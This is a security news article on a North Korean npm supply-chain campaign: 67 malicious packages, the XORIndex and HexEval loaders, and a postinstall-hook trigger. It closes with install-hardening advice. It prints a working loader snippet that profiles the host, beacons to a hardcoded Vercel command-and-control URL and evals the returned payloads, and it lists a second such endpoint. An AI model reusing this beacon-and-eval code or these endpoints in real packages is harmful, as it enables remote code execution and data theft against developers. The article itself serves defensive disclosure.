North Korean threat actors have published 67 malicious npm packages that accumulated more than 17,000 downloads before they were detected. The campaign is an expansion of the ongoing Contagious Interview operation and introduces a new malware loader, XORIndex, alongside the HexEval Loader infrastructure already in use.
Introduction of XORIndex Malware
The newly identified XORIndex loader takes its name from its use of XOR-encoded strings and index-based lookups, obfuscation that keeps endpoints and payload logic out of plain view in the package source and marks a step up in the threat actors’ evasion tradecraft. The malicious packages were pushed to npm from 18 accounts registered with 15 distinct email addresses, and 27 packages were still live at the time of discovery.
Targeted Entities and Attack Framework
Analysts from Socket.dev attribute the campaign to the broader North Korean espionage effort that targets developers, cryptocurrency holders, and anyone with access to sensitive credentials. XORIndex Loader is the first stage of a multi-stage chain: it collects host metadata and beacons out, then decodes and executes the BeaverTail second-stage malware, which in turn references the InvisibleFerret backdoor used for persistent access.
Command and Control Infrastructure
The loader beacons to hardcoded command-and-control endpoints hosted on Vercel, for example https://soc-log.vercel.app/api/ipcheck and https://log-writter.vercel.app/api/ipcheck. Parking C2 on a legitimate, widely used hosting platform means the traffic goes over TLS to a domain with good reputation and blends with ordinary developer tooling, so domain blocklists and simple reputation filtering are unlikely to catch it, and a replacement project can be stood up cheaply when one endpoint is reported.
Parallel Campaigns and Download Statistics
Between June and July 2025, packages carrying the XORIndex Loader were downloaded more than 9,000 times, while the HexEval campaign, which continued in parallel, added roughly 8,000 downloads across newly discovered packages. Running two loader families at once gives the operators redundancy: the takedown of one does not interrupt the other.
Infection Mechanism and Code Execution
Infection begins at install time. The packages declare an npm lifecycle script (a post-install hook) in package.json, so the loader runs as soon as npm install completes, with no user interaction and without the developer ever importing the module. The loader then profiles the host, gathering hostname, username, external IP address, geolocation derived from that IP, and platform details, and posts the result to its command-and-control endpoint, which answers with the JavaScript to execute next.
A representative code snippet from the eth-auditlog package illustrates the loader’s core functionality:
```javascript
// Imports implied by the snippet (the excerpt as quoted omits them)
const os = require('os');
const axios = require('axios');
const publicIp = require('public-ip');

// Collects local telemetry (host/user/IP/geo/platform)
async function gatherInfo() {
  const ip = await publicIp.v4();
  const geo = (await axios.get(`http://ip-api.com/json/${ip}`)).data;
  return {
    host: os.hostname(),
    user: os.userInfo().username,
    ip,
    location: geo,
    platform: os.platform()
  };
}

// Sends beacon and executes threat actor-supplied JavaScript payloads
module.exports = async function writer() {
  const info = await gatherInfo();
  const version = process.env.npm_package_version; // set by npm while lifecycle scripts run
  axios.post('https://log-writter.vercel.app/api/ipcheck', { ...info, version })
    .then(res => {
      eval(res.data.s1); // Execute primary payload
      eval(res.data.s2); // Execute optional secondary payload
    });
};
```
Evolution of Malware Techniques
The earliest XORIndex samples were little more than remote-eval prototypes; later versions added the comprehensive host profiling shown above, heavier string obfuscation, and rotation across several hardcoded C2 endpoints rather than reliance on one. That deliberate progression is what turns a throwaway package into a sustained software supply chain threat.
Broader Context of North Korean Cyber Operations
This campaign is part of a broader pattern of North Korean cyber operations targeting software developers and the open-source community. Previous incidents include the deployment of malicious npm packages designed to steal credentials, deploy backdoors, and extract cryptocurrency data. These operations often involve sophisticated social engineering tactics, such as posing as recruiters on LinkedIn to distribute malicious code under the guise of job assignments.
Implications for the Software Development Community
Sixty-seven malicious packages reaching a registry as widely used as npm is a direct risk to anyone who installs third-party code. Install-time lifecycle scripts are the first thing to review: npm install --ignore-scripts (or ignore-scripts=true in .npmrc) keeps preinstall and postinstall hooks from running, npm ci against a reviewed lockfile prevents silent version drift, and a new or low-download package whose package.json declares a postinstall script deserves a look at what that script does before it enters a build. Packages handed over as part of a recruiting "assignment" warrant the same scrutiny as anything else pulled from the registry.
Conclusion
The deployment of 67 malicious npm packages by North Korean threat actors highlights the evolving nature of cyber threats targeting the software supply chain. The introduction of the XORIndex malware, with its sophisticated evasion techniques and multi-stage attack framework, underscores the need for heightened vigilance and proactive security measures within the developer community.